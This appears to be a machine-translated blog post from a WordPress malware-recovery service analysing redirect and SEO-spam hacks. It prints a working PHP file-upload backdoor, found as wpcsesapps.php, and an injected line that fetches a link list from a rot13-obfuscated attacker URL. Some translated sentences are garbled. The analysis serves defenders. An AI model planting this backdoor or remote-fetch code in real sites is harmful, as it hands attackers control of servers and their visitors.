WordPress Doctor has been recovering sites that have suffered malware tampering, and we would like to explain what kind of redirect hacks (site tampering in which users who access the site are directed to Chinese sites, security sites, etc. without permission) that many sites in particular have been affected by recently. I would like to explain what the code looks like and how it works.


Prerequisites Hackers who seize WordPress administrator privileges

Hackers first take over WordPress administrator privileges by using the following methods.

Entering passwords into the login screen by brute force and repeatedly performing login enforcement to gain administrator privileges (automated by software).
Take advantage of vulnerabilities in plug-ins, themes, and WordPress itself to gain administrator privileges.
Takeover of administrator privileges by taking advantage of a flaw in the wp-config.php setting (e.g., unique key for authentication not set).

WordPress has a function to change files from the administration screen, and this function can be used to embed malicious code into the site.

Tampering that redirects users to a page on a different domain no matter which page they access.

In order to redirect users who access various pages, such as those accessed via search engines, hackers must plant redirection code in files that are loaded by WordPress.
Typical files included in WordPress that are always loaded when the site is displayed include index.php, wp-config.php, and header.php and footer.php included in the theme, which are the files with the highest probability of being tampered with by hackers. The most likely files to be tampered with by hackers are

The image above is a capture of the actual tampering code embedded in wp-config.php.
You can see that the @include instruction loads and executes some file from another location. In many cases, malware code is obfuscated in this way so that the contents of the process cannot be understood.

Place a file on your site that allows you to upload arbitrary files to the server

The redirect hacks that have become popular in recent years always include files with the following code in the server. It can be disguised as a plugin or placed in the wp-content folder in a file called wpcsesapps.php.

if (isset($_POST['upload'])){
if ($_POST['upload']=='1'){
$uploadfile = $_POST['path']. $_FILES['uploadfile']['name'];
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
{echo 'ok';}
else {echo $_FILES['uploadfile']['error'];}
}
if ($_POST['upload']=='2'){
$fp=fopen($_POST['path'],'a');  
fwrite($fp,"\r\n");
fwrite($fp, $_POST['uploadfile']);
fclose($fp);
echo 'ok';
}
}
else {header('Location: . /... /');}

This code is very dangerous because it allows any file to be uploaded to the server from the outside, creating a backdoor, a gateway for hackers to tamper with the server.
This file is not obfuscated and cannot be detected by malware scanners that detect obfuscated code.

Embedding code that redirects to a malicious site in every link in the site’s pages

There was also a case of a theme being tampered with by embedding malicious Javascript code in a file called footer.php, which redirects users to a different site the moment they click on a link on any page of the site.

The XXXXXX part is assumed to be an invalid time.

This code plants a fake link that causes the user to jump to a different site for every link contained in the site. It is also a very clever code that prevents this function from being activated for a certain period of time for users who have already been redirected using COOKIE so that it is only activated once every few hours.

Link to another site that has undergone similar tampering with arbitrary keywords

Finally, a common characteristic of this redirect hack is that it also includes a tampering called an SEO hack.
An SEO hack is the exploitation of the mechanism by which search engines bring a site to the top of the search engine results based on the amount of links it has, by secretly embedding a link to a site that contains malicious code into the site without the site’s administrator being aware of it.
To output this link, the hacker embeds the following tampering into the site

XXXXXX is assumed to be illegal.

@file_get_contents(str_rot13("uggc://scrq8.bet/xxxxxxxxx"));

This code retrieves the link list for the SEO hack from the server owned by the hacker in real time, allowing the hacker to set the URL of the site he wants to display in the search engines through the SEO hack at any time he likes.
The list thus obtained is unknowingly output within the tampered site and the search engines pick it up.

Reference Article
WordPress Defacement Recovery: 5000+ List of Hacked WordPress Sites Discovered

How to Detect Redirect Hack Malware?

Please click here to use the plugin created by WordPress Doctor that can detect redirect hack malware
Free WordPress Doctor: Malware Scan Plugin

Related Posts:

  1. WordPress Rarely, a redirect hack that sends the site to another site only from Google search results.
    This section describes a redirect hack that forces WordPress to go to a different rogue site only in rare cases (some patterns say only on smartphones) when jumping from search engine results, and explains how to deal with it....
  2. Redirect hack that takes you to another site when you click on a link on a WordPress site.
    A redirect hack is a type of tampering in which a hacker alters site data or theme files to force users to go to a page that the hacker wants them to go to instead of the page they originally wanted to see. The following is an explanation of a common example of a redirect hack, in which clicking on...
  3. 5 symptoms that appear when WordPress is infected with malware or has been tampered with.
    The following is a list of common symptoms that occur when a site is infected with malware. If you see something wrong with the behavior of the site, please refer to these symptoms and perform a malware scan....
  4. An example of a redirect hack embedded in a WordPress core file
    Recently there has been an increase in the embedding of JAVASCRIPT-type malware starting with trackmyposs in WordPress core files....
  5. Example of database tampering with a redirect hack that causes a site to jump to another site
    Redirect hacks that cause a site to jump to another site (often a malicious software download, a fake e-commerce site, or a site that makes you click on a robot authentication) are not only tampering with files, but also getting into the database. Here are some examples of database malware tampering and how to deal with them....
  6. Redirect hack that sends you to a malicious site when you click on a screen or link on a WordPress site.
    This section describes a type of malware that is spreading to a large number of files on a very large number of sites these days, in which clicking on various elements of a site sends the user to a different malicious site....